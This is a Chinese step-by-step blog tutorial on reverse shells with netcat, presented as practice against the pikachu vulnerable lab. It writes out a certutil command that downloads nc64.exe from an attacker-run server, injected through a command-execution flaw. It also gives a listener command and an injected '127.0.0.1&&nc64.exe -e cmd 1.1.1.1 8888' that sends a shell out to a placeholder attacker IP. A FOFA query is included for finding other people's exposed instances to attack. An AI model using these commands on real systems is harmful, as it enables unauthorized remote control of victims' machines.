NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学

简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。

下面是nc的常用参数

-d后台执行
-e prog程序重定向,一旦连接,就执行
-g gateway源路由跳数,最大值为8(source-routing hop point[s],up to 8)
-G num源路由指针:4,8,12,… (source-routing pointer: 4,8,12,…)
-h查看帮助信息
-i secs延时的间隔
-l监听模式,用于入站连接
-n指定数字的IP地址,不能用hostname
-o file记录16进制的传输
-p port本地端口号
-r任意指定本地及远程端口
-s addr本地源地址
-uUDP模式(netcat-1.15可以:远程nc -ulp port -e cmd.exe,本地nc -u ip port连接,得到一个shell. )
-w secs指定超时的时间
-z将输入输出关掉——用于扫描时
-v详细输出——用两个-v可得到更详细的内容
前提条件:两台主机之间可以通信,并有一个可供目标站点下载的netcat,如果是云服,需要将控制端防火墙白名单开启。其中实操涉及:远程命令执行&文件上传&反弹shell

(就是自己需要搭一个网站,可使用phpstudy,直接把文件放在www下面就可以直接下载了)

一、将nc文件传入受害主机

首先:我们拿搭建好的pikachu靶场做测试,利用远程命令执行漏洞传入我们事先准备好的nc文件,没有搭建的话可以在fofa上面借用别人的靶场(切记,不要瞎整哈,容易包吃住)

fofa搜索:"pikachu" && country="CN" && title=="Get the pikachu"

文件上传命令:certutil -urlcache -split -f http://自己搭建网站的IP或域名/nc64.exe

二、控制端做反向连接,首先在控制端启动监听

在攻击机上执行nc64.exe -lvvp 8888命令监听本地的8888端口

三、目标机器做正向连接至控制端

把受害主机的cmd终端发送至攻击者主机ip的8888端口,这种连接方式使得控制端能够接收来自受控端的连接,即使受控端的网络环境限制了其主动发起连接的能力

命令:127.0.0.1&&nc64.exe -e cmd 1.1.1.1 8888(这里IP用1.1.1.1代替,实际填写自己的IP)

 四、到这里使用nc的反弹shell就成功啦,可以直接在终端执行相关的命令对受害主机进行操作啦

ps:需要注意的是,不要反弹shell成功后做一些没有意义的操作,咱们要做遵纪守法的人,群众里会有坏人,但那个人不能是咱们

  • 22
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值